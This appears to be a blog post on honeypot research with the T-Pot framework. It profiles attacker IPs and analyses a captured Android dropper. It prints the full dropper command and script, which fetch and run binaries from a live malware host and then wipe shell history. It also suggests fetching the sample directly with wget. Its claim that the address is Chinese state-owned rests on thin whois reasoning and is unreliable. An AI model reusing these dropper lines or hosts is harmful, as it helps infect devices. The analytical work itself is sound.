I was recently tasked with using honeypots to study unanticipated behavior in cyberspace. Here is what I found using the AWS T-POT Honeypot framework (https://github.com/telekom-security/tpotce).
As detailed in a recent news article by the NY Times: https://www.nytimes.com/2021/03/14/us/politics/us-hacks-china-russia.html , China is using US-based infrastructure to launch cyber attacks against the United States. Here is an example.
First, I logged into the TPOT web interface of the Adbhoney honeypot setup in US-EAST-1 and hopped into Kibana. I then filtered on known attacker, chosing the source IP with largest count: 209.141.51.242.
Following this, I used the Talos Intelligence and Whois plugins to find out more information on this IP address.
We see that the Domain owner for this IP subnet is Chinaregistry-shanghai.org, which redirects to chinaregistry.org.cn, which means it is owned by China’s official domain.
I also took a look at the network owner, Frantech Solutions, to see where this IP address is hosted.
We also can see additional IP addresses associated with this Network Owner.
This analysis was performed for a honeypot data collection range of 2 weeks.
In conclusion, we see a US-based brand being used to host IP addresses owned by, and launching attacks originating from China. Specifically, “lat”: 36.1685, “lon”: -115.1164, Las Vegas, Nevada.
*Now we take a look at an unrelated attempt at compromise.*
The attacker IP address in this scenario is 45.144.225.228.
The full line of this command is:
cd /data/local/tmp/; wget http://31.210.20.138/sh.sh; sh sh.sh; curl http://31.210.20.138/c.sh; sh c.sh
We take a look at the first file attempt: sh.sh
Submitting this sample to hybrid-analysis yields some interesting information:
https://hybrid-analysis.com/sample/b6a5250175165b8ec44f55840a0b086769274e7e38c938865572b4cf3ef9682d
We also use the reconnaissance tool Spiderfoot (https://www.spiderfoot.net/documentation/) to analyze the attacker IP address by automatically querying over 100 public data sources:
To extract the lines in this file, we can use the integrated tools on hybrid-analysis.com or by running:
wget http://31.210.20.138/sh.sh > sh.sh.txt
followed by:
cat sh.sh.txt
The extracted strings, one-by-one, for this file is as follows:
#!/bin/shcd /data/local/tmp; wget http://31.210.20.138/uwu/arm5; chmod 777 *;./arm5 Android.arm5;rm -rf *;history -w;history -ccd /data/local/tmp; wget http://31.210.20.138/uwu/arm6; chmod 777 *;./arm6 Android.arm6;rm -rf *;history -w;history -ccd /data/local/tmp; wget http://31.210.20.138/uwu/arm7; chmod 777 *;./arm7 Android.arm7;rm -rf *;history -w;history -ccd /data/local/tmp; wget http://31.210.20.138/uwu/arm; chmod 777 *;./arm Android.arm;rm -rf *;history -w;history -ccd /data/local/tmp; wget http://31.210.20.138/uwu/m68k; chmod 777 *;./m68k Android.m68k;rm -rf *;history -w;history -ccd /data/local/tmp; wget http://31.210.20.138/uwu/mips; chmod 777 *;./mips Android.mips;rm -rf *;history -w;history -ccd /data/local/tmp; wget http://31.210.20.138/uwu/mpsl; chmod 777 *;./mpsl Android.mpsl;rm -rf *;history -w;history -ccd /data/local/tmp; wget http://31.210.20.138/uwu/ppc; chmod 777 *;./ppc Android.ppc;rm -rf *;history -w;history -ccd /data/local/tmp; wget http://31.210.20.138/uwu/sh4; chmod 777 *;./sh4 Android.sh4;rm -rf *;history -w;history -ccd /data/local/tmp; wget http://31.210.20.138/uwu/spc; chmod 777 *;./spc Android.spc;rm -rf *;history -w;history -ccd /data/local/tmp; wget http://31.210.20.138/uwu/x86; chmod 777 *;./x86 Android.x86;rm -rf *;history -w;history -c
Adbhoney is an Android honeypot, so this malicious script is acting as a form of dropper malware, attempting to download additional exploits.
In turn, the malware attempts to move to a world-writable directory, tmp; download further malware; make the new malware executable; run the new malware; delete the file from the target system; and then delete history of it’s execution. It attempts this for several malware types, likely to ensure execution on an Android whose OS specifics the attacker may not know.
In the next blog post, we will take a look at the x86 malware from the last line, what it may be for, and what possible motivations the attacker may have for using it.